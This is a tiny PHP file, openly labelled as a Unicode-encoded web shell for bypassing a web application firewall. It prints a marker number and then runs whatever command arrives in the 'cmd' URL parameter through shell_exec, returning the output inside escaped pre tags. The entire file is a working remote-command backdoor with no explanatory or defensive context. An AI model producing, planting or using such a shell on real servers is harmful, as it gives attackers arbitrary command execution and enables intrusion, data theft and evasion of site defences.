<?php
// Unicode-encoded PHP shell for WAF bypass
echo 686524;
if (isset($_GET['cmd'])) {
    echo "\u003c\u0070\u0072\u0065\u003e" . shell_exec($_GET['cmd']) . "\u003c\u002f\u0070\u0072\u0065\u003e";
}
?>